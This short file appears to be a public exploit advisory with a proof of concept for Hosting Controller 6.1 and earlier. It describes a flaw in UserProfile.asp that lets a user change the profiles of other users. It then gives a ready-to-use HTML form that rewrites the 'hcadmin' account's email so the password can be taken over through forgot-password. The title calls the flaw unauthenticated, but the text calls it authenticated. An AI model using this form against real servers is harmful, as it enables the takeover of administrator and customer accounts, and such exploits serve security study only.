<!--
Hosting Controller <= 0.6.1 Unauthenticated User Registeration
Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).Title: Hosting controller program have a security bugin "UserProfile.asp" that an authenticated user canchange other's profiles.Why is it dangerous: a user can change other's emailaddress and then use forgot password to recieve theirpassword! also he/she can gain administrator passwordby this way!Version: 6.1 HotFix 2.0 and olderDeveloper url: hostingcontroller.comComment: Hosting Controller is an application tomanage a host.Exploit code to proof:--------------------------------Change users profiles: --> <form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post">Username : <input name="UserList" value="hcadmin" type="text" size="50"><br>emailaddress : <input name="emailaddress" value="Crkchat@msn.com" type="text" size="50"><br>firstname : <input name="firstname" value="Crkchat" type="text" size="50"><br><input name="submit" value="submit" type="submit"></form><!-------------------------------------Now u can use forgot password to gain passwords! -->